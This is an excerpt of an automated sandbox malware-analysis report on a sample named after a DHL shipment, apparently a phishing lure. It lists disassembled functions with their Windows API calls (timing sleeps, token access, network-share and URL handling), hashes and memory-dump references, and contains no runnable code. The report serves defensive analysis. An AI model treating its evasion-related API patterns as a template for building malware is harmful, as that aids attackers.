Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d321ade3f62bcea196587b72cdde19adfd548cde17399ee399273b5464ffe319
Instruction ID: c077b41b3c10c5d9e8cee0937a5c5143dc9cd8078bfc2a1c15b3fc68e7267be8
Opcode Fuzzy Hash: d321ade3f62bcea196587b72cdde19adfd548cde17399ee399273b5464ffe319
Instruction Fuzzy Hash: 13018433711226ABDF318BB9AC4496B7BF8AF45BB1B214624F916E7140DB21DD06C6E0

Function 00AC7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00AC747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AC7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AC74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00AC74CA

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 42900c3d4c8032483b85ca53b6c1b9293b87da9f42ed83ae94714585e040dcdf
Instruction ID: fb4d596bfcfc5b9d4eb5f09a38b64966d40a72a6a3cb2558a663bdeb9a628165
Opcode Fuzzy Hash: 42900c3d4c8032483b85ca53b6c1b9293b87da9f42ed83ae94714585e040dcdf
Instruction Fuzzy Hash: 9711ADB5205314ABE720CF98DE09FAABFFCEB00B10F11856DA626D6191D7B0E904DF60

Function 00ACB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ACACD3,?,00008000), ref: 00ACB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ACACD3,?,00008000), ref: 00ACB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00ACACD3,?,00008000), ref: 00ACB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00ACACD3,?,00008000), ref: 00ACB126

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a651003e8ebc171eb632addc95ea9937ca963a2a2458d74a4d48d0c6bb110ddf
Instruction ID: 694dcfd277f343ee6626ce2c085e92dee0de0cb12cf32f273ff693c5ac6507ae
Opcode Fuzzy Hash: a651003e8ebc171eb632addc95ea9937ca963a2a2458d74a4d48d0c6bb110ddf
Instruction Fuzzy Hash: 19112A31C1152CD7CF00DFE5E95ABEEBB78BF09711F124289D941B2181CB315951CB66

Function 00AC2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AC2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC2DD6
GetCurrentThreadId.KERNEL32 ref: 00AC2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AC2DE4

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: e98b71b8da5c99b5669fe5cd8b655cec8c5df3612abc04e2b0ac93e02694935e
Instruction ID: d23c46f6ea5d57800747857adb0cac7423a585f19c34275897ca6105e8802645
Opcode Fuzzy Hash: e98b71b8da5c99b5669fe5cd8b655cec8c5df3612abc04e2b0ac93e02694935e
Instruction Fuzzy Hash: BAE06D711052287AD7205BE39D0DFFB7E6CEF52BB1F011119B106D50809AA08942C6B0

Function 00AF8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A79639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A79693
Part of subcall function 00A79639: SelectObject.GDI32(?,00000000), ref: 00A796A2
Part of subcall function 00A79639: BeginPath.GDI32(?), ref: 00A796B9
Part of subcall function 00A79639: SelectObject.GDI32(?,00000000), ref: 00A796E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AF8887
LineTo.GDI32(?,?,?), ref: 00AF8894
EndPath.GDI32(?), ref: 00AF88A4
StrokePath.GDI32(?), ref: 00AF88B2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7653a7af3ac701e60121f066abc7610d56084455cf86c329b2b61b5a2a8305fc
Instruction ID: 1a394f15bdceca2ada97a9778706de23bf084704d468eff139e104a3c61946cd
Opcode Fuzzy Hash: 7653a7af3ac701e60121f066abc7610d56084455cf86c329b2b61b5a2a8305fc
Instruction Fuzzy Hash: 82F03A36041259BADB129FD5AD09FEE3E59AF06360F148101FA11650E1CB795522CBE9

Function 00A798B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A798CC
SetTextColor.GDI32(?,?), ref: 00A798D6
SetBkMode.GDI32(?,00000001), ref: 00A798E9
GetStockObject.GDI32(00000005), ref: 00A798F1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 41e00b1ebd717d9e25c8176eeff595fc92dcaf9c8ed3a45cd8fdb492496163a9
Instruction ID: 7aac3163a284aa8ce82518647fa47f3582ed6658821d0231dc207d09fed956c1
Opcode Fuzzy Hash: 41e00b1ebd717d9e25c8176eeff595fc92dcaf9c8ed3a45cd8fdb492496163a9
Instruction Fuzzy Hash: BFE06531244244AADB219BF5AD09BFD3F14EB51336F14C319F6FA580E1C3724651DB10

Function 00AC162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00AC1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,00AC11D9), ref: 00AC163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AC11D9), ref: 00AC1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,00AC11D9), ref: 00AC164F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 34bb1df727a8ce7f864085d13546c8e8de43d58d25729b30f20d2a7d059105f1
Instruction ID: 22a6fcf93f5691db3a5a1adb194a088267adcf59b132b47685e348589de661bc
Opcode Fuzzy Hash: 34bb1df727a8ce7f864085d13546c8e8de43d58d25729b30f20d2a7d059105f1
Instruction Fuzzy Hash: F4E08632601215DBDB205FF29F0DFA63B7CEF457A5F154808F245C9080DB344546C750

Function 00ABD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00ABD858
GetDC.USER32(00000000), ref: 00ABD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ABD882
ReleaseDC.USER32(?), ref: 00ABD8A3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 04490a20a3aec7aa0e1e8dbc9af4c51494e39e5ab760ee2c898df63bfaeb5e15
Instruction ID: 54ebb694e27e4a3a1e79738d58a3e28dba139a125a4c079efc75e41fd9999150
Opcode Fuzzy Hash: 04490a20a3aec7aa0e1e8dbc9af4c51494e39e5ab760ee2c898df63bfaeb5e15
Instruction Fuzzy Hash: 45E01AB0804208DFCB81DFE1DA08A7DBBB5FB08321F109409E846E7350CB384902EF40

Function 00ABD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00ABD86C
GetDC.USER32(00000000), ref: 00ABD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ABD882
ReleaseDC.USER32(?), ref: 00ABD8A3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: de1ea2586b27da81aeac7c81cc75518a230189e31ad0e5f64b65e056e6bb33b8
Instruction ID: d8ef82505fab9238f35972ed32f669bf80c58b94358fe2a33defa124807dba99
Opcode Fuzzy Hash: de1ea2586b27da81aeac7c81cc75518a230189e31ad0e5f64b65e056e6bb33b8
Instruction Fuzzy Hash: 89E09A75804208DFCB91DFE5DA0867DBBB5FB08321B149449E94AE7350CB795906DF50

Function 00AD4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A67620: _wcslen.LIBCMT ref: 00A67625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00AD4ED4

Strings

*, xrefs: 00AD4E10
LPT, xrefs: 00AD4DFB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 2eb7c6737d4f77bac03a52e19a8d12de86551abf2cacadc5d8ea7ccff651df6f
Instruction ID: 42d924a068a62179c360f267fb9d6ea18e8fbe8c2f8b8d305891321fca86d683
Opcode Fuzzy Hash: 2eb7c6737d4f77bac03a52e19a8d12de86551abf2cacadc5d8ea7ccff651df6f
Instruction Fuzzy Hash: 87915075A00244AFCB14DF58C584EAABBF1BF48704F18809AE40A9F362D735EE85CB91

Function 00A8E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A8E30D

Strings

pow, xrefs: 00A8E2E5, 00A8E302

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 6461d8b499ef39fda81cb4047ba8f120c8e61aa5bef43ddc2284508885c507ad
Instruction ID: 51b048eed9b9357eb4ae4bd22522f787980c0777842416708fe5c3a3e6a06d71
Opcode Fuzzy Hash: 6461d8b499ef39fda81cb4047ba8f120c8e61aa5bef43ddc2284508885c507ad
Instruction Fuzzy Hash: FC514771B2C202D6CF15F718CA057BE3BE4EB50B40F304998E0D6872A9EF358C859B96

Function 00A7E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00A7E1B1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: d3867b5e06dd8791f83ae8d303968c0d2ceb9d5eac70fcd0ce2031a30e791198
Instruction ID: 7ad343f818c21938b8ec6d527f1001804d8a8cbf1a116b92bfdb69941c36b5d8
Opcode Fuzzy Hash: d3867b5e06dd8791f83ae8d303968c0d2ceb9d5eac70fcd0ce2031a30e791198
Instruction Fuzzy Hash: 55512575604246EFDF15DF68C4816FA7BB8EF29310F24C095EC919B2D2DA309D82DB90

Function 00A7F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00A7F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00A7F2BB

Strings

@, xrefs: 00A7F2AF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a50edc0d43e9d9a941e0a336ab963220e1d05dae304c693a3fcf025b2d03e5e6
Instruction ID: e6fa58b6ca0551dc1145e4dc7b938b1e9a53884ba740f3378f00f623c038f442
Opcode Fuzzy Hash: a50edc0d43e9d9a941e0a336ab963220e1d05dae304c693a3fcf025b2d03e5e6
Instruction Fuzzy Hash: 0C5175714187449BD320AF50DD86BAFBBF8FB84714F81884CF2D9410A5EB718529CB66

Function 00AC2999 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AC29EB
SendMessageW.USER32(?,0000110A,00000001,?), ref: 00AC2A8D

Part of subcall function 00AC2C75: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00AC2CE0

Strings

@U=u, xrefs: 00AC29EB, 00AC2A8D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 985fca005c2fe85f184cb697c38a55faab00b32802188d37057caf0ffcc6d9c7
Instruction ID: 152ac0b170d303caa70dfe0f59fe8a53191db7245bdab20d76943f152655e558
Opcode Fuzzy Hash: 985fca005c2fe85f184cb697c38a55faab00b32802188d37057caf0ffcc6d9c7
Instruction Fuzzy Hash: CA414F71A00209ABDF25EF54CA45FFE7BB9AF44750F040029F906A7291DB749E45CBA2

Function 00AE5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00AE57E0
_wcslen.LIBCMT ref: 00AE57EC

Strings

CALLARGARRAY, xrefs: 00AE57E6, 00AE57EB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 96a53b61f2d4d077616e3d8600c419cd244bbb040eae8d26ac5fe1d52083d32e
Instruction ID: f61f85b39b3effe603e502b2ae0c05c56564deace2337a41998315076b95bbcc
Opcode Fuzzy Hash: 96a53b61f2d4d077616e3d8600c419cd244bbb040eae8d26ac5fe1d52083d32e
Instruction Fuzzy Hash: FE41AF31E002099FCB14DFBADA819BEBBF5FF59328F148169E505A7251E7309D81DB90

Function 00ADD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00ADD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00ADD13A

Strings

|, xrefs: 00ADD10B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: bf221cd1c4a3c43b7c657e301334b505c1e2928f1d034e7400de6b2cf75b8aca
Instruction ID: 5d3ec11291b82902b12959d6b85cd49f607ed7a86e3b94920cbce9adf926a9ea
Opcode Fuzzy Hash: bf221cd1c4a3c43b7c657e301334b505c1e2928f1d034e7400de6b2cf75b8aca
Instruction Fuzzy Hash: 1C313E71D00209ABCF15EFA4CD85AEEBFB9FF04300F000119F815A6261E731AA46DB90

Function 00AF356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00AF3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AF365C

Strings

static, xrefs: 00AF35BC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 0c5a0a3a4edfa9ccaff51517443e75f0de2f41e7db168cd09047c09ef2afdca9
Instruction ID: c3ee18af91a9792b177a397a9a30b65c44ea859183c79d7f504ce415995e48bb
Opcode Fuzzy Hash: 0c5a0a3a4edfa9ccaff51517443e75f0de2f41e7db168cd09047c09ef2afdca9
Instruction Fuzzy Hash: E7318E72100208AEDF109FA8DC40EBB73A9FF88724F109619F9A5D7290DA30ED81D760

Function 00AF4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00AF461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF4634

Strings

', xrefs: 00AF458E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0acfdd5af97ae4d6519bd25980890a961d1fa964f49ca0e1e7c527a48ea57252
Instruction ID: 32dfd5498a33e9d9f07294de48a7f90de94a68b25fd6ef8bfc411364d1a00af9
Opcode Fuzzy Hash: 0acfdd5af97ae4d6519bd25980890a961d1fa964f49ca0e1e7c527a48ea57252
Instruction Fuzzy Hash: A6310674A012099FDB14DFA9C990BEA7BB5FF49300F14416AEA05EB351E770A941CF90

Function 00AC286B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00AC2884
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AC28B6

Strings

@U=u, xrefs: 00AC2884, 00AC28B6

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
